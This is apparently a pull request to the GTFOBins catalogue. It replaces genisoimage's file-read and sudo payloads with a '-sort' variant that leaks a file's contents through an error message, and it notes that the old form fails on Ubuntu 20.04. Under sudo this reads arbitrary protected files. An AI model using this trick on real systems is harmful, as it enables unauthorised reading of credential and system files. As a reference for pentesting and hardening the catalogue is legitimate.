### PR TITLE
genisoimage File Read Payload

### DIFF
--- a/_gtfobins/genisoimage.md
+++ b/_gtfobins/genisoimage.md
@@ -4,9 +4,9 @@ functions:
   file-read:
     - code: |
         LFILE=file_to_read
-        genisoimage -q -o - "$LFILE"
+        genisoimage -sort "$LFILE"
   sudo:
     - code: |
         LFILE=file_to_read
-        sudo genisoimage -q -o - "$LFILE"
+        sudo genisoimage -sort "$LFILE"
 ---


### PR DESCRIPTION
The original payload does not work on Ubuntu 20.04. Instead, the `-sort` flag can trigger an error and dump the file content.